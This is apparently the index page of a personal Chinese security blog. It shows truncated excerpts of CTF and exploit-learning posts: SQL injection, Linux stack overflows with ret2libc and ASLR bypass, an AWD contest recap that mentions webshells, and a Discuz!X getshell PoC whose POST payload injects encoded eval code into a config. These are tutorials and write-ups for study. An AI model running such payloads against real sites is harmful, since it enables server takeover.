NEKO

NEKO

superficial aesthetics

自己写得题目ORZ
SQL注入sqli1源码:12345678910111213141516171819202122<?phperror_reporting(0);$conn = mysql_connect('127.0.0.1', 'root', 'root') or die("could not connect:" . mysql_error());mysql_select_db('neko_web1', $conn) or die('can not use:' . mysql_...
cms-vul
都是能百度到的,用到了就记一下. Discuz!X升级getshellpoc:123url:http://www.xxx.net/utility/convert/index.php?a=config&source=d7.2_x2.0post:a=config&source=d7.2_x2.0&submit=yes&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5baaa%0d%0a%0d%0aeval(Chr(101%29.Chr%28118%29.Chr%2897%29.Chr%281...
docker入门
xman2018 pratice的web1的dockerfile写的很好。方法貌似不能用了,参考这个:https://www.cnblogs.com/tianhei/p/7802064.html 推荐教程:docker从入门到实践 https://blog.csdn.net/wy_97/article/details/78984101 docker安装:12345678910# step 1: 安装必要的一些系统工具sudo apt-get updatesudo apt-get -y install apt-transport-https ca-certificates curl so...
Linux-Exploit之使用链接的ret2libc绕过NX bit
写了个简单的demo,没有像实验写得那么复杂.重点是如何使用链接的ret2libc绕过NX bit. 漏洞源码:12345678910111213#include <stdio.h>#include <string.h>void vulnerable(){ char buf[256]; printf("%x\n",&buf); read(0,&buf,500);}int main(){ vulnerable(); return 0;} 关闭aslr:1neko...
记一次awd
午饭还不错,主要是还提供西瓜吃,多余的可以跟主办方要,我要了3盆西瓜. 可能是第一次也是最后一次打awd了. 主要是想看下awd什么个流程. 其次还收获了不少好马. 自己也把别人的不死马给删了,虽然不确定奏不奏效,反正目录里是没了. 有2个队在我们第一台服务器中了2个不死马,我在日别人的第三台服务器.(队友竟然没有把第一台服务器的后门删掉,我也是醉了) FileZilla和Router scan真好用. 自己没什么技术含量,都是靠后门. 还不如直接审计github上的cms,还能弄个cve. 就当是阿宅体验下现充的生活吧. 西安空气质量好差. 同行的人取票时钱包丢了.去找警察,警察不说怎...
Linux-Exploit之绕过ASLR - 第二部分
主要思路是爆破libc基址。漏洞源码:123456789101112#include <stdio.h>#include <string.h>void vulnerable(arg){ char buf[256]; strcpy(buf,arg);}int main(int argc,char* argv[]){ vulnerable(argv[1]); return 0;} 开启aslr:1neko@ubuntu:~/neko/6$ sudo sh -c "echo 2 > /pro...
Linux-Exploit之绕过ASLR - 第一部分
大佬说这个简单,就先做这个了(:з」∠) 其实就只是简单的栈溢出,由于源码中有system(“/bin/sh”),所以直接可以拿来用,就不用管ASLR和NX了. 漏洞源码:12345678910111213141516#include <stdio.h>void sys(){ system("/bin/sh");}void vulnerable(){ char buf[256]; puts("input:/n"); read(0,&buf,512);}int mai...
Linux-Exploit之使用return-to-libc绕过NX bit
先写下自己失败的记录首先记录下遇到的问题,就目前来讲还没有解决.(解决了,看标题3)首先ret2libc原理很简单,就是调用动态链接库里的函数来实现我们的目的.也可以绕过ASLR,详见jarvis的level3. 漏洞源码:12345678910111213#include <stdio.h>void vulnerable(){ char buf[256]; write(1,"input:\n",7); read(0,&buf,512); puts("n3k0"); }int main...
Linux-Exploit之Off-By-One 漏洞 (基于栈)
漏洞源码:12345678910111213141516#include <stdio.h>#include <string.h>void sys(){ system("/bin/sh");}void vulnerable(char* arg){ char buf[256]; strcpy(buf,arg);}int main(int argc,char *argv[]){ vulnerable(argv[1]); return 0;} 关闭aslr:1n...
n3k0
incisive expression